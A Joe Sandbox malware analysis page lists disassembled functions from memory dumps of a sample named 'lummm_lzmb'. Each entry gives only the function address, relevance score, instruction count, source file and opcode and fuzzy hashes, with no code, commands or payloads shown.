Function 02E4471C Relevance: 1.3, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02E44EE9

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: d6ac0ec7ec65fe56271ebe1a5a5e1c547b61a49784c8d24e2acd864267d04b65
Instruction ID: 36a6e848803b43d823f8dd17a6ae6b83608325ae9564eca9680eba6b58fe63f1
Opcode Fuzzy Hash: d6ac0ec7ec65fe56271ebe1a5a5e1c547b61a49784c8d24e2acd864267d04b65
Instruction Fuzzy Hash: AB317C74E04209DFDB15CFA6E408BEEBBB1EF86315F10A06AD410A7291DB341946CF91

Function 012B259B Relevance: 1.3, Strings: 1, Instructions: 79
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Te^q, xrefs: 012B259B

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 802cd534241ad5432d0d5c737aa60b48835834916a76acfb6ea70e30b4ea0414
Instruction ID: bafad81fd8110ecbd85ae375f8da6ee40df80f16b6790b346c58fc964e3a9e29
Opcode Fuzzy Hash: 802cd534241ad5432d0d5c737aa60b48835834916a76acfb6ea70e30b4ea0414
Instruction Fuzzy Hash: DD312534B50205CFDB18DBA8D598BADBBB1AF48344F104469E912DB3A5CB74A801CB50

Function 02E44738 Relevance: 1.3, Strings: 1, Instructions: 64COMMON

Download Yara Rule

Strings

4'^q, xrefs: 02E44EE9

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID: 4'^q
API String ID: 0-1614139903
Opcode ID: b6635a5ffa8d134fe9dacb46af0b43815b4acc56b94c5162a2ef4f7b9cd05e5c
Instruction ID: 0cddcfd9c20a0b7f3bdd224d702273965a1ff4dfbe15e03a6177b104680ea4a7
Opcode Fuzzy Hash: b6635a5ffa8d134fe9dacb46af0b43815b4acc56b94c5162a2ef4f7b9cd05e5c
Instruction Fuzzy Hash: 9C210974E44209CFDB18CFA6E448BFEBBB1EF85315F10A02AD511A7290DB341986CF91

Function 02E43998 Relevance: .8, Instructions: 752COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d187bfa7f824375d49e44dd37bb23643cfdaacafcd798c7c2c9d072745a568b
Instruction ID: 3e270543bd461259d90b3e96259a979d67e3fe94c9c6895fac082ab1b973b7ee
Opcode Fuzzy Hash: 1d187bfa7f824375d49e44dd37bb23643cfdaacafcd798c7c2c9d072745a568b
Instruction Fuzzy Hash: E952BD70549385AFCB169BB4DC59F9A3FB4AF0B304F1A81CAF1409B2B3C6759805DB62

Function 02E43991 Relevance: .7, Instructions: 721COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713961744.0000000002E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e40000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f0d3d7229227fbe61b8a2ce9b5dee0c540e03ca8ce94e6a7be1aec00fdd1ba6
Instruction ID: e14a02549376e2ee33f6eed6e841df632b3130c628260e1b927b46559457d9ba
Opcode Fuzzy Hash: 9f0d3d7229227fbe61b8a2ce9b5dee0c540e03ca8ce94e6a7be1aec00fdd1ba6
Instruction Fuzzy Hash: 84528C71549385AFCB169BB4DC59F9A3FB4AF0B304F1A80CAF1409B2B3C6759805DB62

Function 012BB9AB Relevance: .5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e09948ca47a13c6b41298d9d69c1ecc31c7f1f7eb1c7d07d71bc597b1ac72194
Instruction ID: fb03944d4f834d665b9a087316c342472f5920d44021b824dc6f35f4db8b4a8c
Opcode Fuzzy Hash: e09948ca47a13c6b41298d9d69c1ecc31c7f1f7eb1c7d07d71bc597b1ac72194
Instruction Fuzzy Hash: 75325B7492461A8FDB64DFA8D8D07ECF7B1FB48340F2046A9D51AA7381EB349A81CF45

Function 012BBAF5 Relevance: .4, Instructions: 437COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bb07037f13a5c0c91fa400a8bcfe1f52e671c9414cd935ac11aa25c22840edc
Instruction ID: f8dbc4655a4e2594b22efb65a7a7943de06bae0c6ca6381f62320c375f445933
Opcode Fuzzy Hash: 5bb07037f13a5c0c91fa400a8bcfe1f52e671c9414cd935ac11aa25c22840edc
Instruction Fuzzy Hash: A6225B7492461A8FDB64DFA8D8D06ECF7B1FB48340F2046A9D50AA7381EB349E91CF45

Function 012BBBFF Relevance: .4, Instructions: 395COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32a8dcc4460760be0ef5a935c6e59a9652e8ae3f6ab3cadebf0368f4d3635081
Instruction ID: bff2eca96bd0512052feaf6d7232c789f08e7ae6bf916c7a70193b9d67f58703
Opcode Fuzzy Hash: 32a8dcc4460760be0ef5a935c6e59a9652e8ae3f6ab3cadebf0368f4d3635081
Instruction Fuzzy Hash: 04126D7492421A8FDB64DFA8D8D06ECF7B1FB48340F2046A9D51AA7381EB349E81CF45

Function 012BBD1A Relevance: .4, Instructions: 354COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31c1f5174dc6ace5f2994dd3fa30d0b7f478fbeb60f81b29e122c17e66b35531
Instruction ID: 843893cbce15ffeee04ce1f2724b30bea2cdb250bd4d6d4e173234c8dbb6d697
Opcode Fuzzy Hash: 31c1f5174dc6ace5f2994dd3fa30d0b7f478fbeb60f81b29e122c17e66b35531
Instruction Fuzzy Hash: 1E025CB492521A8FCB64DFA8D8D07ECF7B1FB48344F2046A9D509A7381EB349A91CF45

Function 012BBE5D Relevance: .3, Instructions: 313COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b459eb01d03b06344fe39b36069c6c05dca59f613cf0263b84e6bb8756cd6d8
Instruction ID: 1bcc656c286748945c023a72cb82144e28ef8ddf13760f956e8982a33e319214
Opcode Fuzzy Hash: 9b459eb01d03b06344fe39b36069c6c05dca59f613cf0263b84e6bb8756cd6d8
Instruction Fuzzy Hash: 9BF16DB492421ACFCB64DFA8D8D06ECF7B1FB49344F2046A9D509A7381EB309A91CF45

Function 012BEE48 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 604eca0a042540ce9bcc2b511ce645dfc45bf691e506f41f8258d98fac70eb7b
Instruction ID: a552c3c3e72f9f1ddccd9b738488f587e42260d0ca2b61fb2e805b47f3dfa72a
Opcode Fuzzy Hash: 604eca0a042540ce9bcc2b511ce645dfc45bf691e506f41f8258d98fac70eb7b
Instruction Fuzzy Hash: B3B1AE75A24216CFC721DF58D9848E9FBF1FB45350B1A8AAAE518CB352D330EC45CB81

Function 012BBF9D Relevance: .3, Instructions: 269COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1464032a352c71212df99a0d6f38c80623d710608ab24b4f78c27d132f9a6080
Instruction ID: d3c5055f9c6eb526296da9bd4b5bc03eebd68ef0c1b068cf4f8e16f1e6b06644
Opcode Fuzzy Hash: 1464032a352c71212df99a0d6f38c80623d710608ab24b4f78c27d132f9a6080
Instruction Fuzzy Hash: 9FD16EB492521A8FCB64DFA8D8D06ECF7B1FB45344F1046AAD509A7381EB309E91CF45

Function 012BC0E1 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba4fbe9b29d3e6a441e227e9113e6bcc0b2c58d756d9691d32abec3625a0e02b
Instruction ID: 471ebaa652f19c91be31c12ce6f8aee46aa80fe81559a50aab856c87295be040
Opcode Fuzzy Hash: ba4fbe9b29d3e6a441e227e9113e6bcc0b2c58d756d9691d32abec3625a0e02b
Instruction Fuzzy Hash: DFB17FB491522A8FDB64DFA8D8D06ECF7B1FB49344F1046AAC509A7381DB309E91CF45

Function 012B1D8D Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: facc387cbf7702486d5ed5c0273e1ef8d29dcc2f0c37e1c18a070b9797a92d46
Instruction ID: 927315a850293c4c1170d48d7342826bedd1cc13e159a53c24a145a91ed1f317
Opcode Fuzzy Hash: facc387cbf7702486d5ed5c0273e1ef8d29dcc2f0c37e1c18a070b9797a92d46
Instruction Fuzzy Hash: F66144307242058FDB66DB28E8A47EA3BF1EF84340F14886AE506CB392DB75DC52C751

Function 012BD5C9 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e30c94b6d86f6cd081bb2e3d5913b4076d934769468378adf1a98f3a79ff110
Instruction ID: 1f4ccea43193cde0a4f68a7cc5fadbc01ce4b6a8c950fe8f7c7c9417d7d32406
Opcode Fuzzy Hash: 6e30c94b6d86f6cd081bb2e3d5913b4076d934769468378adf1a98f3a79ff110
Instruction Fuzzy Hash: 8F71D334E21229CFC754EF89D5C48E9BBF2FB49345B5AC5A5E5099B222D330ED42CB81

Function 012BD5D8 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d07cb236a7e3c63cf0ba9cef637fe6017943834b8533fb99e8ce2ea3ef92a86
Instruction ID: 2cd484e14e03df08480a010186f48aed864e9eeb0b5b4b2904c7674a333f6978
Opcode Fuzzy Hash: 0d07cb236a7e3c63cf0ba9cef637fe6017943834b8533fb99e8ce2ea3ef92a86
Instruction Fuzzy Hash: 9371D334E21229CFC754EF89D5C48E9BBF1FB09345B56C5A5E5099B222D730ED42CB81

Function 012BF1B8 Relevance: .2, Instructions: 165COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d19692417f44df5eda0ca16c889252b9f15d55cfa07b82c8435cde4e904e516
Instruction ID: 84233888ab7d30ff2cf8977117727e7e0dc5d97afef7d346731e64bb23de0ed5
Opcode Fuzzy Hash: 5d19692417f44df5eda0ca16c889252b9f15d55cfa07b82c8435cde4e904e516
Instruction Fuzzy Hash: 9B71F438A21255CFC794DF59DAC8CAABBF2FB49341B1681A5E5099B326C770ED40CF42

Function 0758BDD0 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c31489173e03e0f17b7108f853d4496c0d402c2bc5a5a1c87cd4579dfe4201
Instruction ID: dbd7157a964fbd5aebc0c18070ff100baa211de6a6f4c60684fba12c74c23cae
Opcode Fuzzy Hash: e0c31489173e03e0f17b7108f853d4496c0d402c2bc5a5a1c87cd4579dfe4201
Instruction Fuzzy Hash: E951E4B4E0621ADFCB94EFA4E5846EDBBB6FF49300F20452AE505B7254C7305E45CB91

Function 012B842E Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 910f14ef3da1fecdb6d3e24a967c373fed0f91cd23963dcb4d4967ef3ff02ab0
Instruction ID: bcb3369266aacc5178b8b8764268887bd8e1d757d58bb6a3decea2c8a15b989f
Opcode Fuzzy Hash: 910f14ef3da1fecdb6d3e24a967c373fed0f91cd23963dcb4d4967ef3ff02ab0
Instruction Fuzzy Hash: E4611674A20229CFDBA4DF19D988BA9FBB5BB45340F0582A5E50DA7305D730DD81CF81

Function 0758F0D0 Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7570000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e69495667b7f6a674bb569ef74c51077a5522035453d548ac1958d560c17808b
Instruction ID: 5ed2c4718ebcf90bd9a0ca2e3a4de6350013de1bf9bb5aa6a94eecf2bead079f
Opcode Fuzzy Hash: e69495667b7f6a674bb569ef74c51077a5522035453d548ac1958d560c17808b
Instruction Fuzzy Hash: F8513974E011089FDB84EFAAE884AEEBBB2FF89304F10D529E415A7394DB349945CF50

Function 012B847B Relevance: .1, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a85814ba8d97503d38bbcdecf768b72e891c2d3eeb22a9991ab3a40113fad051
Instruction ID: 5b2c24b775b23c130cf70eef851b4cf694eb7611d0540e512da165c840827d1c
Opcode Fuzzy Hash: a85814ba8d97503d38bbcdecf768b72e891c2d3eeb22a9991ab3a40113fad051
Instruction Fuzzy Hash: A551F474A2421ACFDBA4DF19E988BA9FBB5BB45340F0582A5E50DA7309C730DD85CF81

Function 012B3E70 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 552e8b723a1d11cc70c669e2a0c72d747fda8180781802ce01811e57d9f96451
Instruction ID: f292fb00b2d46e6cfe3953a24203ebdbc7eb06833767a4628c4d1f7d8eb3660c
Opcode Fuzzy Hash: 552e8b723a1d11cc70c669e2a0c72d747fda8180781802ce01811e57d9f96451
Instruction Fuzzy Hash: 06419E34B202068BDB20DB79E4DE7EE7AF1BB88381F004125E946D7384EF74C9458B91

Function 012B83C8 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9faf7fa80afb4c4e37a2a2a2fb95861b118fc285da5835acd0f58f6a2d5f6c28
Instruction ID: d6e68ade26343070d015f2991acac9a8ad6bdce2f3858dc5f3ef6fdfc4a9d67c
Opcode Fuzzy Hash: 9faf7fa80afb4c4e37a2a2a2fb95861b118fc285da5835acd0f58f6a2d5f6c28
Instruction Fuzzy Hash: FB511674A25116CFD7A8DF19E988AA9FBB6BB44341F05C2A5E50D9B309CB30DD81CF81

Function 012B332F Relevance: .1, Instructions: 116COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d22735d4eb3591bf9f8fa0c8294174efae9ec33c4f82e3cc681cb9ef646fd218
Instruction ID: 0c0acbe9c7535a034c7aa496ef792628b28ade19b54325eb5e19f6510341afbb
Opcode Fuzzy Hash: d22735d4eb3591bf9f8fa0c8294174efae9ec33c4f82e3cc681cb9ef646fd218
Instruction Fuzzy Hash: 1541CC74A20212CFC761DF6DD589AAA7BF0FB04380F0489A9E505CB355EB74E944CF81

Function 012B34C0 Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb20870fab66be2bcb829ba089a1f2d2351c940645ec04bba2dfd11ab65d8c92
Instruction ID: f6a595e9e4410ba7715fe234285c70de27ccb62e766b9ada5ea2b9ac76c6fa6e
Opcode Fuzzy Hash: fb20870fab66be2bcb829ba089a1f2d2351c940645ec04bba2dfd11ab65d8c92
Instruction Fuzzy Hash: F641D335E24219CFDB11DFA8D882BEEBBB1FB48340F054167E206EB341D6B999059BC1

Function 012B34D0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 814e02719cf719f001d07c023a10bbc79ee0ef4608fcd46a18ff0b97a69198a6
Instruction ID: cbdd90b3030532b5d7f3746dbefa319ba18867e09012d21226a6b7038de5cec9
Opcode Fuzzy Hash: 814e02719cf719f001d07c023a10bbc79ee0ef4608fcd46a18ff0b97a69198a6
Instruction Fuzzy Hash: 2541B235E24219CFDB11DFA8D882BEEBBF5FB48340F144122E10AEB340D6B899059BC1

Function 012B2E38 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2972e4e1fab5e880727e9a1dcb4db5b71e3c287e3a2ae70f3695ebe1898a2346
Instruction ID: 7baba705fd4af461e178cc576be9e1a2a4a6161fddacd86c73a48ad682eb4ad2
Opcode Fuzzy Hash: 2972e4e1fab5e880727e9a1dcb4db5b71e3c287e3a2ae70f3695ebe1898a2346
Instruction Fuzzy Hash: 9141A231A34219CBDB10DFA9C981BEEBBB5EB48B40F104126E105EB359D7B4B9469B81

Function 012B2E32 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a60cd9cc7f7fd5b0893b45d3bc20b002a04ad41684caab0f1ff7f9a03538298a
Instruction ID: d78861d4d39c021595ab45b3f0526427be1d003cfca0b0d9f45c5b9bae618789
Opcode Fuzzy Hash: a60cd9cc7f7fd5b0893b45d3bc20b002a04ad41684caab0f1ff7f9a03538298a
Instruction Fuzzy Hash: CE41B231A34219CBDB10DFA9C9C1BEFBBB5EB08740F104166E105EB289D7B4B9429B81

Function 012B5205 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b44e1fcc93a4ce6cbca699c63403ff43a132d046088fffe44a3b0c52909d77d
Instruction ID: a3045f50ffaca92c4113c01b8f438006513b2ac2e0704d89cd4b9ffd1c1e972c
Opcode Fuzzy Hash: 2b44e1fcc93a4ce6cbca699c63403ff43a132d046088fffe44a3b0c52909d77d
Instruction Fuzzy Hash: 8F31AC74A242498FCB45EFF8E8E46EDBBB1FF88300B10456AD409E3384EB345905CB61

Function 012B5A4E Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ad39363511b82705103adcccd7ebd560a4e71303cad3c119eaac87ca2880e10
Instruction ID: 05f4ca16b45224764e4dea474782d124c2b578f064be08b8594cc58535fcfbcb
Opcode Fuzzy Hash: 5ad39363511b82705103adcccd7ebd560a4e71303cad3c119eaac87ca2880e10
Instruction Fuzzy Hash: 8031CF30B242068FD794EB29D4D4AA97BE2BB44384F148468D505CF34AEB76DC42CF81

Function 012B439F Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60dcd92c5558715d0c5a4907bb74b457f9e3663ea22c236caa5f44fef48a87ec
Instruction ID: d30287a934efd00398ad6153ec7c2eb5d76bab1f67f8b6c2519cd05dd4ebd0f2
Opcode Fuzzy Hash: 60dcd92c5558715d0c5a4907bb74b457f9e3663ea22c236caa5f44fef48a87ec
Instruction Fuzzy Hash: E031D0B5A102418FC714EF78E5DD689BFB3FB88301B198269D006CB38ADB30D846CB52

Function 056E84C0 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1727750626.00000000056E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_56e0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5a38f2939e902c28b4daa4fa8fc3c48bca85468a9a7becc1024b331ec300387
Instruction ID: 810a38a54b661369a3af8875b2adda09285419a35ec9e15c19c7c8a339c04846
Opcode Fuzzy Hash: a5a38f2939e902c28b4daa4fa8fc3c48bca85468a9a7becc1024b331ec300387
Instruction Fuzzy Hash: 173117B0D012589FCB14DFAAC590ADEBFF5BF48350F248429E909AB350DB749946CFA0

Function 012B6718 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4e86601b3dd0f53a5be0f57b15a7e566122fc94edf1d7f98c090d2d13dce0662
Instruction ID: f186c744c88ebe2a0a3cd5a4a7a7c99880faf20e0d99502f9ae2e8bf1120924a
Opcode Fuzzy Hash: 4e86601b3dd0f53a5be0f57b15a7e566122fc94edf1d7f98c090d2d13dce0662
Instruction Fuzzy Hash: 2E21D234A21215CFC729DB29D8985BABBF1FF48340B058A6DE51A8B681E734A841DB81

Function 012B5308 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8239a03cdb0ff8c8244f7f84ad6b889392a4e932eecfe748c803de493d6653ba
Instruction ID: 822bb3d84086c7a2abf3c5bee78c8a3ddc5953bebae8eed503861b24b680221a
Opcode Fuzzy Hash: 8239a03cdb0ff8c8244f7f84ad6b889392a4e932eecfe748c803de493d6653ba
Instruction Fuzzy Hash: DC3104B9E102099FDB54EFA9E994AADBBF6FB88301F104529D509E3344EB306911CB60

Function 012B9978 Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e934f4266742d4de7c590a2800aaa0484ce48192d532f25a3195b2ebbdb6693e
Instruction ID: 70a2a24042a1e46ec83d1f8ab910cad91aeebda39d95267524761ff4d337c0bf
Opcode Fuzzy Hash: e934f4266742d4de7c590a2800aaa0484ce48192d532f25a3195b2ebbdb6693e
Instruction Fuzzy Hash: C031A074A10125CFCB94EF49D5D9CB9BBE6FB49344749C1A5E6098B321DB31DC81CB41

Function 012B9968 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1713565518.00000000012B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_lummm_lzmb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fec32705d7ed3060b1168c233adf4df9f3a65e11e426abe88f65a350def46062
Instruction ID: 186bf018c1a30c37e5870ee4c0a53881f42afe8642dde75e8548dbe2ec6f940c
Opcode Fuzzy Hash: fec32705d7ed3060b1168c233adf4df9f3a65e11e426abe88f65a350def46062
Instruction Fuzzy Hash: 793180B4A10121CFCB94DF99D5DACB9BBE2FB49344749C195E6498B322D731DC81CB42

Function 0758B408 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1731510720.0000000007570000.00000040.00000800.00020000.00000000.sdmp, Offset: 07570000, based on PE: false

Joe Sandbox IDA Plugin

